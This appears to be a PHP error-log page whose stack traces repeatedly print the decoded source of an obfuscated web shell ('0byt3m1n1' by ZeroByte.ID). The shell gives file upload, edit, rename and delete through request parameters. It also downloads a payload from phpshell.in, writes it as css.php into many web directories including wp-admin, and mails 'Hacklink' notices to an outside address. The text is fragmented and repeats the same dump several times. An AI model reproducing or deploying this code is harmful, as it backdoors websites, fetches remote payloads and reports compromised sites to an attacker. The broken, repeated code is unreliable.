[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1967539816fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:136
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 137
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1999539816fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:137 not exits2done2 .
( ! ) Warning: fopen(C:/wamp64/www/cgi-bin/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 145
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2240539816fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:145
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 146
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2274539816fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:146
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 147
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

